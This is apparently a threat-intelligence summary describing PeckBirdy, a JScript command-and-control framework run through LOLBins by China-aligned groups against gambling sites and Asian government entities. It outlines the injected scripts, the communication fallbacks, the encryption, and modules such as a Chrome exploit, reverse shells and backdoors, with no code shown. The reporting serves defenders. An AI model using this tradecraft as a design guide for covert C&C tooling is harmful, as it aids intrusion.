PeckBirdy - A Versatile Script Framework for LOLBins Exploitation Used by China-aligned Threat Groups

PeckBirdy is a sophisticated JScript-based C&C framework used by China-aligned APT groups to exploit LOLBins across multiple environments, delivering advanced backdoors to target gambling industries and Asian government entities. Since 2023, we have been observing threat campaigns employing a previously unseen script-based command-and-control (C&C) framework which we named PeckBirdy, being used against Chinese gambling industries, as well as malicious activities targeting Asian government entities and private organizations. While tracking this framework, we identified at least two campaigns using PeckBirdy, which we were able to link to several China-aligned advanced persistent threat (APT) actors.

PeckBirdy is a script-based framework which, while possessing advanced capabilities, is implemented using JScript, an old script language. This is to ensure that the framework could be launched across different execution environments via LOLBins (Living off the land binaries). This flexibility allowed us to observe PeckBirdy in various kill chain stages, including being used as a watering-hole control server during the initial attack phase, as a reverse shell server during the lateral movement phase, and as a C&C server during the backdoor phase.

Beginning in 2023, we noticed multiple Chinese gambling websites being injected with malicious scripts with links to remote servers. When victims visit these gambling websites, the injected scripts download and execute the main script of the PeckBirdy routine, allowing attackers to remotely deliver and execute JavaScript. This constitutes the first campaign we identified, which we are tracking under the name SHADOW-VOID-044. During July 2024, we observed another campaign primarily targeting Asian government entities and private organizations, which we tracked under the campaign name SHADOW-EARTH-045. In one case, the injection was on a login page of a government’s system, while in another incident, we noticed the attacker using MSHTA to execute PeckBirdy as a remote access channel for lateral movement in a private organization. The threat actor behind the attacks also developed a .NET executable to launch PeckBirdy with ScriptControl. These findings demonstrate the versatility of PeckBirdy’s design, which enables it to serve multiple purposes.

PeckBirdy can be executed in various environments, including browsers, MSHTA, WScript, Classic ASP, Node JS, and .NET (ScriptControl). To extend PeckBirdy’s capability, its developer implemented it using an old script language known as JScript (followed by ECMAScript 3), and designed it to support multiple communication protocols to ensure compatibility in various environments. The default method uses the WebSocket protocol to communicate with the PeckBirdy server. If WebSocket is not supported, it attempts to detect the presence of Adobe Flash, after which it will create a Flash ActiveX object to establish TCP socket communication. If neither of these methods are supported, PeckBirdy can use the Comet and LocalComet methods, which are based on HTTP(S) and AJAX protocols. The subsequent communication is encrypted using AES and then encoded with Base64, with the AES encryption key being the ATTACK ID value from the configuration.

The scripts we found included: The exploitation script for the CVE-2020-16040 vulnerability affecting Google Chrome; Scripts for social engineering pop-ups designed to deceive victims into downloading and executing malicious files; Scripts for delivering additional backdoors that are executed via Electron JS; Scripts to establish reverse shells via TCP sockets. Based on the infrastructure owned by the threat actors, we identified two distinct modular backdoors, HOLODONUT and MKDOOR, linked to SHADOW-VOID-044. HOLODONUT is a .NET-based modular backdoor we found within the threat actor’s infrastructure. To execute HOLODONUT, the threat actors deployed a customized simple downloader used to retrieve the payload from the remote server downloader that we tracked as NEXLOAD.

For more details, read the complete article here.